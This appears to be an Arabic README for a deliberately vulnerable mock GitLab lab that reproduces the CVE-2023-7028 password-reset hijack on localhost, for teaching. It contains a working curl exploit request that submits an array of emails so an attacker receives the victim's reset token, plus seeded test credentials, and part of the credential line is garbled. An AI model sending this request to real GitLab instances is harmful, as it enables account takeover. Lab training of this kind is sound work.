
# مثيل GitLab ضعيف يحاكي اختطاف إعادة تعيين كلمة المرور CVE-2023-7028 يوضح استغلال معامل البريد الإلكتروني القائم على المصفوفات والاستيلاء على الحساب. للاستخدام المخبري التعليمي فقط.
CVE-2023-7028 (CVSS 10.0): POST /users/password يقبل مصفوفة user[email][] — يجد الخادم المستخدم عبر email[0] لكنه يرسل نفس رمز إعادة التعيين إلى كل عنوان → مهاجم يملك [email protected] يختطف حساب [email protected].
المتأثر: GitLab CE/EE <16.5.6, <16.6.4, <16.7.2. هذا الـ mock يعيد إنتاج التدفق القابل للاستغلال في الإصدار 16.6.0 (قاعدة بيانات JSON، بدون SMTP).
npm install && npm start → http://127.0.0.1:3000 (أو PORT=3001 npm start; إعادة محاولة تلقائية إذا كان المنفذ مشغولاً; localhost فقط).
بيانات مبدئية: [email protected]/s3cur3P@ss!, , في .
[email protected]/BobSecure1![email protected]/5iveL!fedata/users.jsoncurl -X POST http://127.0.0.1:3000/users/password -d "user[email][][email protected]&user[email][][email protected]"
تحقق من http://127.0.0.1:3000/mailbox أو /api/emails — كلاهما يحصل على نفس الرمز. افتح .../users/password/edit?reset_password_token=TOKEN للاستيلاء على الحساب.
الوضع الطبيعي: user[email][email protected] → رسالة واحدة. صندوق البريد يعرض كل الرسائل; لا شيء يغادر المضيف.
MIT — للاستخدام المخبري فقط، لا تعرّضه للإنترنت.